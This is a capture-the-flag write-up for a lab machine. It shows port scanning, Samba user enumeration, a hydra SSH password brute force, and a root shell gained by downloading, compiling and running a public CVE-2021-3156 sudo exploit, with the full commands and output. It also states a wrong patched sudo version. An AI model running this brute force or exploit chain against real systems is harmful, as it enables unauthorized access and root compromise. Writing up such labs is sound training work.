Escalate your privileges by exploiting vulnerable binaries.
Enumerate the machine and get an interactive shell. Exploit an SUID bit file, use GNU debugger to take advantage of a buffer overflow and gain root access by PATH manipulation.
There are more points up for grabs in this room.
What are the login credential for initial access.
Answer format should be in username:password
Hint 1: RID range 1000-1003 Hint 2: The longest username has the unsecure password.
Step one, enumerate open ports and services running.
sudo nmap -sS -sV -T4 --open -Pn -p- 10.10.17.162 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 15:15 EST Nmap scan report for 10.10.17.162 Host is up (0.15s latency). Not shown: 65505 closed ports, 27 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: THM_EXPLOIT; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds
NetBIOS/Samba running on ports 139 and 445. Enumerate the users and shared folders.
enum4linux 10.10.17.162 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 13 15:10:40 2021 [...] ======================================================================= | Users on 10.10.17.162 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2007993849-1719925537-2372789573 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kel (Local User) S-1-22-1-1001 Unix User\des (Local User) S-1-22-1-1002 Unix User\tryhackme (Local User) S-1-22-1-1003 Unix User\noentry (Local User) [+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password '' S-1-5-21-2007993849-1719925537-2372789573-500 *unknown*\*unknown* (8) S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\nobody (Local User) [...] S-1-5-21-2007993849-1719925537-2372789573-513 THM_EXPLOIT\None (Domain Group) [...] [+] Enumerating users using SID S-1-5-32 and logon username '', password '' [...] S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [...] ============================================= | Getting printer info for 10.10.17.162 | ============================================= No printers returned. enum4linux complete on Sat Mar 13 15:20:47 2021
Use hydra to do brute force on ssh service and gain the tryhackme password.
hydra -l tryhackme -P /usr/share/wordlists/rockyou.txt 10.10.17.162 ssh Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 15:38:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.17.162:22/ [STATUS] 179.00 tries/min, 179 tries in 00:01h, 14344223 to do in 1335:36h, 16 active [STATUS] 113.00 tries/min, 339 tries in 00:03h, 14344063 to do in 2115:39h, 16 active [STATUS] 117.00 tries/min, 819 tries in 00:07h, 14343583 to do in 2043:15h, 16 active [ssh] host: 10.10.17.162 login: tryhackme password: PASSWORD_TEXT 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 15:46:03
The easy way
By last January, the Qualys research team has discovered a heap overflow vulnerability, CVE-2021-3156, in sudo that allows any unprivileged user to gain root privileges on Linux without requiring a password. The CVE-2021-3156 vulnerability, introduced in 2011, was fixed in the latest version, sudo 9.5p2, and released on January 26, 2021.
If you are playing with some old CTF room, it is very possible that the machine is vulnerable to CVE-2021-3156.
This is not a new room, let’s test for Baron Sammedit. The test is simple and we can know if the machine is vulnerable.
sudoedit -s '\' $(python3 -c 'print("A"*1000)') malloc(): memory corruption Aborted (core dumped)
It is vulnerable.
There are an exploit done in github, and all our job is just download and use it.
From your local machine download the code of the exploit and compile with make.
wget https://github.com/blasty/CVE-2021-3156/archive/main.zip --2021-03-13 15:57:52-- https://github.com/blasty/CVE-2021-3156/archive/main.zip Resolving github.com (github.com)... 22.214.171.124 Connecting to github.com (github.com)|126.96.36.199|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [following] --2021-03-13 15:57:52-- https://codeload.github.com/blasty/CVE-2021-3156/zip/main Resolving codeload.github.com (codeload.github.com)... 188.8.131.52 Connecting to codeload.github.com (codeload.github.com)|184.108.40.206|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/zip] Saving to: ‘main.zip’ main.zip [ <=> ] 4.22K --.-KB/s in 0s 2021-03-13 15:57:52 (8.88 MB/s) - ‘main.zip’ saved  unzip main.zip Archive: main.zip da68f7c1a2961595a3226b903f1fc180b8824255 creating: CVE-2021-3156-main/ inflating: CVE-2021-3156-main/Makefile inflating: CVE-2021-3156-main/README.md inflating: CVE-2021-3156-main/brute.sh inflating: CVE-2021-3156-main/hax.c inflating: CVE-2021-3156-main/lib.c cd CVE-2021-3156-main/ make rm -rf libnss_X mkdir libnss_X gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
Start a local web server with python3
python3 -m http.server
From the room machine download the binaries, set the executable flag and run the exploit.
cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS" NAME="Ubuntu" VERSION="18.04.3 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.3 LTS" VERSION_ID="18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic chmod +x -R * ./sudo-hax-me-a-sandwich ** CVE-2021-3156 PoC by blasty <[email protected]> usage: ./sudo-hax-me-a-sandwich <target> available targets: ------------------------------------------------------------ 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28 ------------------------------------------------------------ manual mode: ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len> ./sudo-hax-me-a-sandwich 0 ** CVE-2021-3156 PoC by blasty <[email protected]> using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212) ** pray for your rootshell.. ** [+] bl1ng bl1ng! We got it! # id uid=0(root) gid=0(root) groups=0(root),1002(tryhackme)
Done, you are root. Now just collects the flags and finish this room.
/bin/bash # ls /root root.txt # cat /root/root.txt The flag: ROOT_FLAG. Also, thank you for your participation. The room is built with love. DesKel out.
ls /home/des/ bof bof64.c flag.txt # cat /home/des/flag.txt Good job on exploiting the SUID file. Never assign +s to any system executable files. Remember, Check gtfobins. You flag is DES_FLAG login crdential (In case you need it) username: des password: DES_PASSWORD
ls /home/kel/ exe exe.c flag.txt [email protected]_exploit:/tmp/10.6.60.115:8000# cat /home/kel/flag.txt You flag is KEL_FLAG The user credential username: kel password: KEL_PASSWORD
So guys and girls, this is done, was fast, but not beautiful, later I will try to finish this room in the right manner.
But also, it is important, to perceive that any not updated host can be vulnerable to this exploit and a simple test and update can prevent further damage.